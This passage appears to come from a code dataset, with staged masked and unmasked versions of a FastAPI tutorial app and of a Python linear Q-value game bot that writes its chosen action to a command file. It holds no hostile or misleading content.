response.headers['X-Process-Time'] = '{}'.format(str(round(process_time, 4)))
return response
@app.middleware('http')
async def add_process_name(request: Request, call_next):
response = await call_next(request)
response.headers['X-Owner-Server'] = 'Kane'
return response
@app.post('/items')
async def base_model(item: Item):
item_dict = item.dict()
return {'message': item_dict}
@app.put('/items/{item_id}')
async def item_id(item_id: int, item: Item):
return {'item_id': item_id, **item.dict()}
@app.get("/items_id/{item_id}")
async def read_items(
item_id: int = Path(..., title="The ID of the item to get"),
q: Optional[str] = Query(None, alias="item-query")
):
results = {"item_id": item_id}
if q:
results.update({"q": q})
return results
@app.get('/peoples')
async def fetch_movies(query: str = None): # query param string
payload = [p[query] for p in payloads['peoples']]
return payload
@app.get('/member')
async def member(item: Item, X_Item_ID: str = Header(...)): # Header
print(X_Item_ID)
if X_Item_ID != 'member':
raise HTTPException(status_code=400, detail="X-Item-ID header invalid")
return JSONResponse(content={item.name: 'kane', item.price: 123.33})
@app.get('/member/token')
async def member_token(x_token: str = Cookie(None)):
print(x_token)
return {'message': f'success cookie {x_token}'}
@app.get('/api_body/{item_id}') # dynamic route
async def api_body(item_id: str):
return {'item_id': item_id}
@app.post('/payload_request', response_model=Item, status_code=status.HTTP_201_CREATED)
async def payload_request(item: Item):
return item
@app.post("/payload_json")
async def create_item(payload: dict = Body(...)):
print(payload)
return payload
@app.post('/form_data')
async def form_data(password: str = Form(...), username: str = Form(...)):
return {'message': {'user': username, 'pwd': password}}
@app.post('/cookies')
async def cookies(response: Response):
response.set_cookie(key='foo', value='value')
return {'message': 'cookies darken'}
@app.get('/')
@app.get('/index', tags=['dashboard'])
async def index(request: Request):
return templates.TemplateResponse('template_fastapi/login.vue', context={'request': request})
@app.get("/func_element", response_model=Item, tags=["Description"], deprecated=True)
async def func_element(item: Item):
"""
Get Data Element:
- **name**: my_name
- **price**: price
"""
return item
@app.post("/func_item", response_model=Item, tags=["Description"], summary="Create an item",
description="Create an item with all the , name, description, price, tax and a set of unique tags")
async def fuc_item(item: Item):
update_item = item.dict()
update_item['name'] = 'kane_ja'
return update_item
@app.post('/json_response', response_model=Item, tags=['Description'])
async def json_response(item: Item):
"""
Return JsonResponse
- **Item**: name
- **status**: 201
"""
return JSONResponse(content={item.name: 'kaneeang'}, status_code=201)
if __name__ == '__main__':
uvicorn.run('fastapi_route_config:app', debug=True, port=8080)
|
normal
|
{
"blob_id": "70188d011ef60b1586864c4b85a9f9e70e5a4caf",
"index": 7386,
"step-1": "<mask token>\n\n\nclass Item(BaseModel):\n name: str\n price: float\n\n\nclass ValidationError(APIRoute):\n\n def get_route_handler(self) ->Callable:\n original_route_handler = super().get_route_handler()\n\n async def customer_route_handler(request: Request) ->Response:\n try:\n return await original_route_handler(request)\n except RequestValidationError as exc:\n body = await request.body()\n detail = {'error': exc.errors(), 'body': body.decode()}\n raise HTTPException(status_code=200, detail=detail)\n return customer_route_handler\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass Item(BaseModel):\n name: str\n price: float\n\n\nclass ValidationError(APIRoute):\n\n def get_route_handler(self) ->Callable:\n original_route_handler = super().get_route_handler()\n\n async def customer_route_handler(request: Request) ->Response:\n try:\n return await original_route_handler(request)\n except RequestValidationError as exc:\n body = await request.body()\n detail = {'error': exc.errors(), 'body': body.decode()}\n raise HTTPException(status_code=200, detail=detail)\n return customer_route_handler\n\n\n<mask token>\napp.mount('/static', StaticFiles(directory='static'), name='static')\n<mask token>\n\n\n@app.middleware('http')\nasync def add_process_time_header(request: Request, call_next):\n start_time = time.time()\n response = await call_next(request)\n process_time = time.time() - start_time\n response.headers['X-Process-Time'] = '{}'.format(str(round(process_time,\n 4)))\n return response\n\n\n@app.middleware('http')\nasync def add_process_name(request: Request, call_next):\n response = await call_next(request)\n response.headers['X-Owner-Server'] = 'Kane'\n return response\n\n\n@app.post('/items')\nasync def base_model(item: Item):\n item_dict = item.dict()\n return {'message': item_dict}\n\n\n@app.put('/items/{item_id}')\nasync def item_id(item_id: int, item: Item):\n return {'item_id': item_id, **item.dict()}\n\n\n@app.get('/items_id/{item_id}')\nasync def read_items(item_id: int=Path(..., title=\n 'The ID of the item to get'), q: Optional[str]=Query(None, alias=\n 'item-query')):\n results = {'item_id': item_id}\n if q:\n results.update({'q': q})\n return results\n\n\n@app.get('/peoples')\nasync def fetch_movies(query: str=None):\n payload = [p[query] for p in payloads['peoples']]\n return payload\n\n\n@app.get('/member')\nasync def member(item: Item, X_Item_ID: str=Header(...)):\n print(X_Item_ID)\n if X_Item_ID != 'member':\n raise HTTPException(status_code=400, detail='X-Item-ID header invalid')\n return JSONResponse(content={item.name: 'kane', item.price: 123.33})\n\n\n@app.get('/member/token')\nasync def member_token(x_token: str=Cookie(None)):\n print(x_token)\n return {'message': f'success cookie {x_token}'}\n\n\n@app.get('/api_body/{item_id}')\nasync def api_body(item_id: str):\n return {'item_id': item_id}\n\n\n@app.post('/payload_request', response_model=Item, status_code=status.\n HTTP_201_CREATED)\nasync def payload_request(item: Item):\n return item\n\n\n@app.post('/payload_json')\nasync def create_item(payload: dict=Body(...)):\n print(payload)\n return payload\n\n\n@app.post('/form_data')\nasync def form_data(password: str=Form(...), username: str=Form(...)):\n return {'message': {'user': username, 'pwd': password}}\n\n\n@app.post('/cookies')\nasync def cookies(response: Response):\n response.set_cookie(key='foo', value='value')\n return {'message': 'cookies darken'}\n\n\n@app.get('/')\n@app.get('/index', tags=['dashboard'])\nasync def index(request: Request):\n return templates.TemplateResponse('template_fastapi/login.vue', context\n ={'request': request})\n\n\n@app.get('/func_element', response_model=Item, tags=['Description'],\n deprecated=True)\nasync def func_element(item: Item):\n \"\"\"\n Get Data Element:\n - **name**: my_name\n - **price**: price\n \"\"\"\n return item\n\n\n@app.post('/func_item', response_model=Item, tags=['Description'], summary=\n 'Create an item', description=\n 'Create an item with all the , name, description, price, tax and a set of unique tags'\n )\nasync def fuc_item(item: Item):\n update_item = item.dict()\n update_item['name'] = 'kane_ja'\n return update_item\n\n\n@app.post('/json_response', response_model=Item, tags=['Description'])\nasync def json_response(item: Item):\n \"\"\"\n Return JsonResponse\n - **Item**: name\n - **status**: 201\n \"\"\"\n return JSONResponse(content={item.name: 'kaneeang'}, status_code=201)\n\n\nif __name__ == '__main__':\n uvicorn.run('fastapi_route_config:app', debug=True, port=8080)\n",
"step-3": "<mask token>\npayloads = {'peoples': [{'firstname': 'watcharapon', 'lastname':\n 'weeraborirak', 'age': '24', 'city': 'bangkok'}, {'firstname': 'somsak',\n 'lastname': 'tamjai', 'age': '22', 'city': 'bangkok'}, {'firstname':\n 'rakkana', 'lastname': 'meejai', 'age': '66', 'city': 'outcast'}]}\n\n\nclass Item(BaseModel):\n name: str\n price: float\n\n\nclass ValidationError(APIRoute):\n\n def get_route_handler(self) ->Callable:\n original_route_handler = super().get_route_handler()\n\n async def customer_route_handler(request: Request) ->Response:\n try:\n return await original_route_handler(request)\n except RequestValidationError as exc:\n body = await request.body()\n detail = {'error': exc.errors(), 'body': body.decode()}\n raise HTTPException(status_code=200, detail=detail)\n return customer_route_handler\n\n\napp = FastAPI()\napp.router.route_class = ValidationError\napp.mount('/static', StaticFiles(directory='static'), name='static')\ntemplates = Jinja2Templates(directory='templates')\nclient = TestClient(app)\n\n\n@app.middleware('http')\nasync def add_process_time_header(request: Request, call_next):\n start_time = time.time()\n response = await call_next(request)\n process_time = time.time() - start_time\n response.headers['X-Process-Time'] = '{}'.format(str(round(process_time,\n 4)))\n return response\n\n\n@app.middleware('http')\nasync def add_process_name(request: Request, call_next):\n response = await call_next(request)\n response.headers['X-Owner-Server'] = 'Kane'\n return response\n\n\n@app.post('/items')\nasync def base_model(item: Item):\n item_dict = item.dict()\n return {'message': item_dict}\n\n\n@app.put('/items/{item_id}')\nasync def item_id(item_id: int, item: Item):\n return {'item_id': item_id, **item.dict()}\n\n\n@app.get('/items_id/{item_id}')\nasync def read_items(item_id: int=Path(..., title=\n 'The ID of the item to get'), q: Optional[str]=Query(None, alias=\n 'item-query')):\n results = {'item_id': item_id}\n if q:\n results.update({'q': q})\n return results\n\n\n@app.get('/peoples')\nasync def fetch_movies(query: str=None):\n payload = [p[query] for p in payloads['peoples']]\n return payload\n\n\n@app.get('/member')\nasync def member(item: Item, X_Item_ID: str=Header(...)):\n print(X_Item_ID)\n if X_Item_ID != 'member':\n raise HTTPException(status_code=400, detail='X-Item-ID header invalid')\n return JSONResponse(content={item.name: 'kane', item.price: 123.33})\n\n\n@app.get('/member/token')\nasync def member_token(x_token: str=Cookie(None)):\n print(x_token)\n return {'message': f'success cookie {x_token}'}\n\n\n@app.get('/api_body/{item_id}')\nasync def api_body(item_id: str):\n return {'item_id': item_id}\n\n\n@app.post('/payload_request', response_model=Item, status_code=status.\n HTTP_201_CREATED)\nasync def payload_request(item: Item):\n return item\n\n\n@app.post('/payload_json')\nasync def create_item(payload: dict=Body(...)):\n print(payload)\n return payload\n\n\n@app.post('/form_data')\nasync def form_data(password: str=Form(...), username: str=Form(...)):\n return {'message': {'user': username, 'pwd': password}}\n\n\n@app.post('/cookies')\nasync def cookies(response: Response):\n response.set_cookie(key='foo', value='value')\n return {'message': 'cookies darken'}\n\n\n@app.get('/')\n@app.get('/index', tags=['dashboard'])\nasync def index(request: Request):\n return templates.TemplateResponse('template_fastapi/login.vue', context\n ={'request': request})\n\n\n@app.get('/func_element', response_model=Item, tags=['Description'],\n deprecated=True)\nasync def func_element(item: Item):\n \"\"\"\n Get Data Element:\n - **name**: my_name\n - **price**: price\n \"\"\"\n return item\n\n\n@app.post('/func_item', response_model=Item, tags=['Description'], summary=\n 'Create an item', description=\n 'Create an item with all the , name, description, price, tax and a set of unique tags'\n )\nasync def fuc_item(item: Item):\n update_item = item.dict()\n update_item['name'] = 'kane_ja'\n return update_item\n\n\n@app.post('/json_response', response_model=Item, tags=['Description'])\nasync def json_response(item: Item):\n \"\"\"\n Return JsonResponse\n - **Item**: name\n - **status**: 201\n \"\"\"\n return JSONResponse(content={item.name: 'kaneeang'}, status_code=201)\n\n\nif __name__ == '__main__':\n uvicorn.run('fastapi_route_config:app', debug=True, port=8080)\n",
"step-4": "from fastapi import FastAPI, Header, Cookie, Form, Request, requests, Body, Response, HTTPException, status, Path, Query\nfrom fastapi.responses import HTMLResponse\nfrom typing import Optional\nfrom fastapi.testclient import TestClient\nfrom typing import List, Callable\nfrom fastapi.staticfiles import StaticFiles\nfrom fastapi.templating import Jinja2Templates\nfrom fastapi.exceptions import RequestValidationError\nfrom fastapi.routing import APIRoute\nfrom starlette.responses import JSONResponse\nfrom pydantic import BaseModel\nimport uvicorn\nimport time\npayloads = {'peoples': [{'firstname': 'watcharapon', 'lastname':\n 'weeraborirak', 'age': '24', 'city': 'bangkok'}, {'firstname': 'somsak',\n 'lastname': 'tamjai', 'age': '22', 'city': 'bangkok'}, {'firstname':\n 'rakkana', 'lastname': 'meejai', 'age': '66', 'city': 'outcast'}]}\n\n\nclass Item(BaseModel):\n name: str\n price: float\n\n\nclass ValidationError(APIRoute):\n\n def get_route_handler(self) ->Callable:\n original_route_handler = super().get_route_handler()\n\n async def customer_route_handler(request: Request) ->Response:\n try:\n return await original_route_handler(request)\n except RequestValidationError as exc:\n body = await request.body()\n detail = {'error': exc.errors(), 'body': body.decode()}\n raise HTTPException(status_code=200, detail=detail)\n return customer_route_handler\n\n\napp = FastAPI()\napp.router.route_class = ValidationError\napp.mount('/static', StaticFiles(directory='static'), name='static')\ntemplates = Jinja2Templates(directory='templates')\nclient = TestClient(app)\n\n\n@app.middleware('http')\nasync def add_process_time_header(request: Request, call_next):\n start_time = time.time()\n response = await call_next(request)\n process_time = time.time() - start_time\n response.headers['X-Process-Time'] = '{}'.format(str(round(process_time,\n 4)))\n return response\n\n\n@app.middleware('http')\nasync def add_process_name(request: Request, call_next):\n response = await call_next(request)\n response.headers['X-Owner-Server'] = 'Kane'\n return response\n\n\n@app.post('/items')\nasync def base_model(item: Item):\n item_dict = item.dict()\n return {'message': item_dict}\n\n\n@app.put('/items/{item_id}')\nasync def item_id(item_id: int, item: Item):\n return {'item_id': item_id, **item.dict()}\n\n\n@app.get('/items_id/{item_id}')\nasync def read_items(item_id: int=Path(..., title=\n 'The ID of the item to get'), q: Optional[str]=Query(None, alias=\n 'item-query')):\n results = {'item_id': item_id}\n if q:\n results.update({'q': q})\n return results\n\n\n@app.get('/peoples')\nasync def fetch_movies(query: str=None):\n payload = [p[query] for p in payloads['peoples']]\n return payload\n\n\n@app.get('/member')\nasync def member(item: Item, X_Item_ID: str=Header(...)):\n print(X_Item_ID)\n if X_Item_ID != 'member':\n raise HTTPException(status_code=400, detail='X-Item-ID header invalid')\n return JSONResponse(content={item.name: 'kane', item.price: 123.33})\n\n\n@app.get('/member/token')\nasync def member_token(x_token: str=Cookie(None)):\n print(x_token)\n return {'message': f'success cookie {x_token}'}\n\n\n@app.get('/api_body/{item_id}')\nasync def api_body(item_id: str):\n return {'item_id': item_id}\n\n\n@app.post('/payload_request', response_model=Item, status_code=status.\n HTTP_201_CREATED)\nasync def payload_request(item: Item):\n return item\n\n\n@app.post('/payload_json')\nasync def create_item(payload: dict=Body(...)):\n print(payload)\n return payload\n\n\n@app.post('/form_data')\nasync def form_data(password: str=Form(...), username: str=Form(...)):\n return {'message': {'user': username, 'pwd': password}}\n\n\n@app.post('/cookies')\nasync def cookies(response: Response):\n response.set_cookie(key='foo', value='value')\n return {'message': 'cookies darken'}\n\n\n@app.get('/')\n@app.get('/index', tags=['dashboard'])\nasync def index(request: Request):\n return templates.TemplateResponse('template_fastapi/login.vue', context\n ={'request': request})\n\n\n@app.get('/func_element', response_model=Item, tags=['Description'],\n deprecated=True)\nasync def func_element(item: Item):\n \"\"\"\n Get Data Element:\n - **name**: my_name\n - **price**: price\n \"\"\"\n return item\n\n\n@app.post('/func_item', response_model=Item, tags=['Description'], summary=\n 'Create an item', description=\n 'Create an item with all the , name, description, price, tax and a set of unique tags'\n )\nasync def fuc_item(item: Item):\n update_item = item.dict()\n update_item['name'] = 'kane_ja'\n return update_item\n\n\n@app.post('/json_response', response_model=Item, tags=['Description'])\nasync def json_response(item: Item):\n \"\"\"\n Return JsonResponse\n - **Item**: name\n - **status**: 201\n \"\"\"\n return JSONResponse(content={item.name: 'kaneeang'}, status_code=201)\n\n\nif __name__ == '__main__':\n uvicorn.run('fastapi_route_config:app', debug=True, port=8080)\n",
"step-5": "from fastapi import FastAPI, Header, Cookie, Form, Request, requests, Body, Response, HTTPException, status, Path, Query\nfrom fastapi.responses import HTMLResponse\nfrom typing import Optional\nfrom fastapi.testclient import TestClient\nfrom typing import List, Callable\nfrom fastapi.staticfiles import StaticFiles\nfrom fastapi.templating import Jinja2Templates\nfrom fastapi.exceptions import RequestValidationError\nfrom fastapi.routing import APIRoute\nfrom starlette.responses import JSONResponse\nfrom pydantic import BaseModel\nimport uvicorn\nimport time\n\npayloads = {\n 'peoples': [\n {\n 'firstname': 'watcharapon',\n 'lastname': 'weeraborirak',\n 'age': '24',\n 'city': 'bangkok'\n },\n {\n 'firstname': 'somsak',\n 'lastname': 'tamjai',\n 'age': '22',\n 'city': 'bangkok'\n },\n {\n 'firstname': 'rakkana',\n 'lastname': 'meejai',\n 'age': '66',\n 'city': 'outcast'\n },\n ]\n}\n\n\nclass Item(BaseModel):\n name: str\n price: float\n\n\nclass ValidationError(APIRoute):\n def get_route_handler(self) -> Callable:\n original_route_handler = super().get_route_handler()\n\n async def customer_route_handler(request: Request) -> Response:\n try:\n return await original_route_handler(request)\n except RequestValidationError as exc:\n body = await request.body()\n detail = {'error': exc.errors(), 'body': body.decode()}\n raise HTTPException(status_code=200, detail=detail)\n\n return customer_route_handler\n\n\napp = FastAPI()\napp.router.route_class = ValidationError\napp.mount('/static', StaticFiles(directory='static'), name='static')\ntemplates = Jinja2Templates(directory='templates')\nclient = TestClient(app)\n\n\n@app.middleware('http')\nasync def add_process_time_header(request: Request, call_next):\n start_time = time.time()\n response = await call_next(request)\n process_time = time.time() - start_time\n response.headers['X-Process-Time'] = '{}'.format(str(round(process_time, 4)))\n return response\n\n\n@app.middleware('http')\nasync def add_process_name(request: Request, call_next):\n response = await call_next(request)\n response.headers['X-Owner-Server'] = 'Kane'\n return response\n\n\n@app.post('/items')\nasync def base_model(item: Item):\n item_dict = item.dict()\n return {'message': item_dict}\n\n\n@app.put('/items/{item_id}')\nasync def item_id(item_id: int, item: Item):\n return {'item_id': item_id, **item.dict()}\n\n\n@app.get(\"/items_id/{item_id}\")\nasync def read_items(\n item_id: int = Path(..., title=\"The ID of the item to get\"),\n q: Optional[str] = Query(None, alias=\"item-query\")\n):\n results = {\"item_id\": item_id}\n if q:\n results.update({\"q\": q})\n return results\n\n\n@app.get('/peoples')\nasync def fetch_movies(query: str = None): # query param string\n payload = [p[query] for p in payloads['peoples']]\n return payload\n\n\n@app.get('/member')\nasync def member(item: Item, X_Item_ID: str = Header(...)): # Header\n print(X_Item_ID)\n if X_Item_ID != 'member':\n raise HTTPException(status_code=400, detail=\"X-Item-ID header invalid\")\n return JSONResponse(content={item.name: 'kane', item.price: 123.33})\n\n\n@app.get('/member/token')\nasync def member_token(x_token: str = Cookie(None)):\n print(x_token)\n return {'message': f'success cookie {x_token}'}\n\n\n@app.get('/api_body/{item_id}') # dynamic route\nasync def api_body(item_id: str):\n return {'item_id': item_id}\n\n\n@app.post('/payload_request', response_model=Item, status_code=status.HTTP_201_CREATED)\nasync def payload_request(item: Item):\n return item\n\n\n@app.post(\"/payload_json\")\nasync def create_item(payload: dict = Body(...)):\n print(payload)\n return payload\n\n\n@app.post('/form_data')\nasync def form_data(password: str = Form(...), username: str = Form(...)):\n return {'message': {'user': username, 'pwd': password}}\n\n\n@app.post('/cookies')\nasync def cookies(response: Response):\n response.set_cookie(key='foo', value='value')\n return {'message': 'cookies darken'}\n\n\n@app.get('/')\n@app.get('/index', tags=['dashboard'])\nasync def index(request: Request):\n return templates.TemplateResponse('template_fastapi/login.vue', context={'request': request})\n\n\n@app.get(\"/func_element\", response_model=Item, tags=[\"Description\"], deprecated=True)\nasync def func_element(item: Item):\n \"\"\"\n Get Data Element:\n - **name**: my_name\n - **price**: price\n \"\"\"\n return item\n\n\n@app.post(\"/func_item\", response_model=Item, tags=[\"Description\"], summary=\"Create an item\",\n description=\"Create an item with all the , name, description, price, tax and a set of unique tags\")\nasync def fuc_item(item: Item):\n update_item = item.dict()\n update_item['name'] = 'kane_ja'\n return update_item\n\n\n@app.post('/json_response', response_model=Item, tags=['Description'])\nasync def json_response(item: Item):\n \"\"\"\n Return JsonResponse\n - **Item**: name\n - **status**: 201\n \"\"\"\n return JSONResponse(content={item.name: 'kaneeang'}, status_code=201)\n\n\nif __name__ == '__main__':\n uvicorn.run('fastapi_route_config:app', debug=True, port=8080)\n",
"step-ids": [
3,
4,
5,
6,
7
]
}
|
[
3,
4,
5,
6,
7
] |
<|reserved_special_token_0|>
class LinearBot(object):
def __init__(self, player, player_name, weights_file, basis):
self.reader = StateEncapsulator(player, player_name)
with open(STATE_FILENAME, 'r') as f:
data = json.load(f)
self.state = self.reader.parse_state(data)
with open(weights_file, 'rb') as pkl:
self.weights = pickle.load(pkl)
self.action_mapper = ActionMapper()
self.basis = basis
self.command = ''
<|reserved_special_token_0|>
def write_action(self):
action_list = self.__get_next_action(self.state)
if not np.all(action_list == DO_NOTHING_ACTION) and action_list[2
] != -1:
self.command = str(action_list[0]) + ',' + str(action_list[1]
) + ',' + str(action_list[2])
with open('command.txt', 'w') as outfl:
outfl.write(self.command)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class LinearBot(object):
def __init__(self, player, player_name, weights_file, basis):
self.reader = StateEncapsulator(player, player_name)
with open(STATE_FILENAME, 'r') as f:
data = json.load(f)
self.state = self.reader.parse_state(data)
with open(weights_file, 'rb') as pkl:
self.weights = pickle.load(pkl)
self.action_mapper = ActionMapper()
self.basis = basis
self.command = ''
def __get_next_action(self, sp):
sp = sp.flatten()
q_values = []
for action in self.action_mapper.triples:
sp_ap = np.array(list(sp) + list(action))
sp_ap = self.basis(sp_ap)
q_values.append(np.dot(sp_ap, self.weights))
return list(self.action_mapper.triples[np.argmax(q_values)])
def write_action(self):
action_list = self.__get_next_action(self.state)
if not np.all(action_list == DO_NOTHING_ACTION) and action_list[2
] != -1:
self.command = str(action_list[0]) + ',' + str(action_list[1]
) + ',' + str(action_list[2])
with open('command.txt', 'w') as outfl:
outfl.write(self.command)
if __name__ == '__main__':
with open(CONFIG_FILENAME, 'r') as f:
data = json.load(f)
player_name = data['nickName']
player = 'A' if player_name == 'Guido' else 'B'
bot = LinearBot(player, player_name, WEIGHTS_FILENAME, actions_cubic_basis)
bot.write_action()
<|reserved_special_token_1|>
<|reserved_special_token_0|>
STATE_FILENAME = 'state3.json'
CONFIG_FILENAME = 'bot.json'
WEIGHTS_FILENAME = 'weights.pkl'
DO_NOTHING_ACTION = [-1, -1, -1]
class LinearBot(object):
def __init__(self, player, player_name, weights_file, basis):
self.reader = StateEncapsulator(player, player_name)
with open(STATE_FILENAME, 'r') as f:
data = json.load(f)
self.state = self.reader.parse_state(data)
with open(weights_file, 'rb') as pkl:
self.weights = pickle.load(pkl)
self.action_mapper = ActionMapper()
self.basis = basis
self.command = ''
def __get_next_action(self, sp):
sp = sp.flatten()
q_values = []
for action in self.action_mapper.triples:
sp_ap = np.array(list(sp) + list(action))
sp_ap = self.basis(sp_ap)
q_values.append(np.dot(sp_ap, self.weights))
return list(self.action_mapper.triples[np.argmax(q_values)])
def write_action(self):
action_list = self.__get_next_action(self.state)
if not np.all(action_list == DO_NOTHING_ACTION) and action_list[2
] != -1:
self.command = str(action_list[0]) + ',' + str(action_list[1]
) + ',' + str(action_list[2])
with open('command.txt', 'w') as outfl:
outfl.write(self.command)
if __name__ == '__main__':
with open(CONFIG_FILENAME, 'r') as f:
data = json.load(f)
player_name = data['nickName']
player = 'A' if player_name == 'Guido' else 'B'
bot = LinearBot(player, player_name, WEIGHTS_FILENAME, actions_cubic_basis)
bot.write_action()
<|reserved_special_token_1|>
import numpy as np
import json
import random
from encapsulate_state import StateEncapsulator
from scalar_to_action import ActionMapper
import pickle
from basis_functions import identity_basis, interactive_basis, actions_only_basis, actions_cubic_basis, BASIS_MAP
import matplotlib.pyplot as plt
STATE_FILENAME = 'state3.json'
CONFIG_FILENAME = 'bot.json'
WEIGHTS_FILENAME = 'weights.pkl'
DO_NOTHING_ACTION = [-1, -1, -1]
class LinearBot(object):
def __init__(self, player, player_name, weights_file, basis):
self.reader = StateEncapsulator(player, player_name)
with open(STATE_FILENAME, 'r') as f:
data = json.load(f)
self.state = self.reader.parse_state(data)
with open(weights_file, 'rb') as pkl:
self.weights = pickle.load(pkl)
self.action_mapper = ActionMapper()
self.basis = basis
self.command = ''
def __get_next_action(self, sp):
sp = sp.flatten()
q_values = []
for action in self.action_mapper.triples:
sp_ap = np.array(list(sp) + list(action))
sp_ap = self.basis(sp_ap)
q_values.append(np.dot(sp_ap, self.weights))
return list(self.action_mapper.triples[np.argmax(q_values)])
def write_action(self):
action_list = self.__get_next_action(self.state)
if not np.all(action_list == DO_NOTHING_ACTION) and action_list[2
] != -1:
self.command = str(action_list[0]) + ',' + str(action_list[1]
) + ',' + str(action_list[2])
with open('command.txt', 'w') as outfl:
outfl.write(self.command)
if __name__ == '__main__':
with open(CONFIG_FILENAME, 'r') as f:
data = json.load(f)
player_name = data['nickName']
player = 'A' if player_name == 'Guido' else 'B'
bot = LinearBot(player, player_name, WEIGHTS_FILENAME, actions_cubic_basis)
bot.write_action()
<|reserved_special_token_1|>
import numpy as np
import json
import random
from encapsulate_state import StateEncapsulator
from scalar_to_action import ActionMapper
import pickle
from basis_functions import identity_basis, interactive_basis, actions_only_basis, actions_cubic_basis, BASIS_MAP
import matplotlib.pyplot as plt
STATE_FILENAME = "state3.json"
CONFIG_FILENAME = "bot.json"
WEIGHTS_FILENAME = "weights.pkl"
DO_NOTHING_ACTION = [-1, -1, -1]
class LinearBot(object):
def __init__(self, player, player_name, weights_file, basis):
self.reader = StateEncapsulator(player, player_name)
with open(STATE_FILENAME, "r") as f:
data = json.load(f)
self.state = self.reader.parse_state(data)
with open(weights_file, "rb") as pkl:
self.weights = pickle.load(pkl)
self.action_mapper = ActionMapper()
self.basis = basis
self.command = ""
# Expects as input a 3D tensor representing the state, un-flattened; returns a list action
def __get_next_action(self, sp):
sp = sp.flatten()
q_values = []
for action in self.action_mapper.triples:
sp_ap = np.array(list(sp) + list(action))
sp_ap = self.basis(sp_ap)
q_values.append(np.dot(sp_ap, self.weights))
return list(self.action_mapper.triples[np.argmax(q_values)])
def write_action(self):
action_list = self.__get_next_action(self.state)
if (not np.all(action_list == DO_NOTHING_ACTION)) and action_list[2] != -1:
self.command = str(action_list[0]) + "," + str(action_list[1]) + "," + str(action_list[2])
with open("command.txt", "w") as outfl:
outfl.write(self.command)
############################################################################################
if __name__ == "__main__":
with open(CONFIG_FILENAME, "r") as f:
data = json.load(f)
player_name = data["nickName"]
player = "A" if player_name == "Guido" else "B"
bot = LinearBot(player, player_name, WEIGHTS_FILENAME, actions_cubic_basis)
bot.write_action()
|
flexible
|
{
"blob_id": "e9a6baf10efc5b6bd07af1fe352b0b17ecc172bd",
"index": 1855,
"step-1": "<mask token>\n\n\nclass LinearBot(object):\n\n def __init__(self, player, player_name, weights_file, basis):\n self.reader = StateEncapsulator(player, player_name)\n with open(STATE_FILENAME, 'r') as f:\n data = json.load(f)\n self.state = self.reader.parse_state(data)\n with open(weights_file, 'rb') as pkl:\n self.weights = pickle.load(pkl)\n self.action_mapper = ActionMapper()\n self.basis = basis\n self.command = ''\n <mask token>\n\n def write_action(self):\n action_list = self.__get_next_action(self.state)\n if not np.all(action_list == DO_NOTHING_ACTION) and action_list[2\n ] != -1:\n self.command = str(action_list[0]) + ',' + str(action_list[1]\n ) + ',' + str(action_list[2])\n with open('command.txt', 'w') as outfl:\n outfl.write(self.command)\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass LinearBot(object):\n\n def __init__(self, player, player_name, weights_file, basis):\n self.reader = StateEncapsulator(player, player_name)\n with open(STATE_FILENAME, 'r') as f:\n data = json.load(f)\n self.state = self.reader.parse_state(data)\n with open(weights_file, 'rb') as pkl:\n self.weights = pickle.load(pkl)\n self.action_mapper = ActionMapper()\n self.basis = basis\n self.command = ''\n\n def __get_next_action(self, sp):\n sp = sp.flatten()\n q_values = []\n for action in self.action_mapper.triples:\n sp_ap = np.array(list(sp) + list(action))\n sp_ap = self.basis(sp_ap)\n q_values.append(np.dot(sp_ap, self.weights))\n return list(self.action_mapper.triples[np.argmax(q_values)])\n\n def write_action(self):\n action_list = self.__get_next_action(self.state)\n if not np.all(action_list == DO_NOTHING_ACTION) and action_list[2\n ] != -1:\n self.command = str(action_list[0]) + ',' + str(action_list[1]\n ) + ',' + str(action_list[2])\n with open('command.txt', 'w') as outfl:\n outfl.write(self.command)\n\n\nif __name__ == '__main__':\n with open(CONFIG_FILENAME, 'r') as f:\n data = json.load(f)\n player_name = data['nickName']\n player = 'A' if player_name == 'Guido' else 'B'\n bot = LinearBot(player, player_name, WEIGHTS_FILENAME, actions_cubic_basis)\n bot.write_action()\n",
"step-3": "<mask token>\nSTATE_FILENAME = 'state3.json'\nCONFIG_FILENAME = 'bot.json'\nWEIGHTS_FILENAME = 'weights.pkl'\nDO_NOTHING_ACTION = [-1, -1, -1]\n\n\nclass LinearBot(object):\n\n def __init__(self, player, player_name, weights_file, basis):\n self.reader = StateEncapsulator(player, player_name)\n with open(STATE_FILENAME, 'r') as f:\n data = json.load(f)\n self.state = self.reader.parse_state(data)\n with open(weights_file, 'rb') as pkl:\n self.weights = pickle.load(pkl)\n self.action_mapper = ActionMapper()\n self.basis = basis\n self.command = ''\n\n def __get_next_action(self, sp):\n sp = sp.flatten()\n q_values = []\n for action in self.action_mapper.triples:\n sp_ap = np.array(list(sp) + list(action))\n sp_ap = self.basis(sp_ap)\n q_values.append(np.dot(sp_ap, self.weights))\n return list(self.action_mapper.triples[np.argmax(q_values)])\n\n def write_action(self):\n action_list = self.__get_next_action(self.state)\n if not np.all(action_list == DO_NOTHING_ACTION) and action_list[2\n ] != -1:\n self.command = str(action_list[0]) + ',' + str(action_list[1]\n ) + ',' + str(action_list[2])\n with open('command.txt', 'w') as outfl:\n outfl.write(self.command)\n\n\nif __name__ == '__main__':\n with open(CONFIG_FILENAME, 'r') as f:\n data = json.load(f)\n player_name = data['nickName']\n player = 'A' if player_name == 'Guido' else 'B'\n bot = LinearBot(player, player_name, WEIGHTS_FILENAME, actions_cubic_basis)\n bot.write_action()\n",
"step-4": "import numpy as np\nimport json\nimport random\nfrom encapsulate_state import StateEncapsulator\nfrom scalar_to_action import ActionMapper\nimport pickle\nfrom basis_functions import identity_basis, interactive_basis, actions_only_basis, actions_cubic_basis, BASIS_MAP\nimport matplotlib.pyplot as plt\nSTATE_FILENAME = 'state3.json'\nCONFIG_FILENAME = 'bot.json'\nWEIGHTS_FILENAME = 'weights.pkl'\nDO_NOTHING_ACTION = [-1, -1, -1]\n\n\nclass LinearBot(object):\n\n def __init__(self, player, player_name, weights_file, basis):\n self.reader = StateEncapsulator(player, player_name)\n with open(STATE_FILENAME, 'r') as f:\n data = json.load(f)\n self.state = self.reader.parse_state(data)\n with open(weights_file, 'rb') as pkl:\n self.weights = pickle.load(pkl)\n self.action_mapper = ActionMapper()\n self.basis = basis\n self.command = ''\n\n def __get_next_action(self, sp):\n sp = sp.flatten()\n q_values = []\n for action in self.action_mapper.triples:\n sp_ap = np.array(list(sp) + list(action))\n sp_ap = self.basis(sp_ap)\n 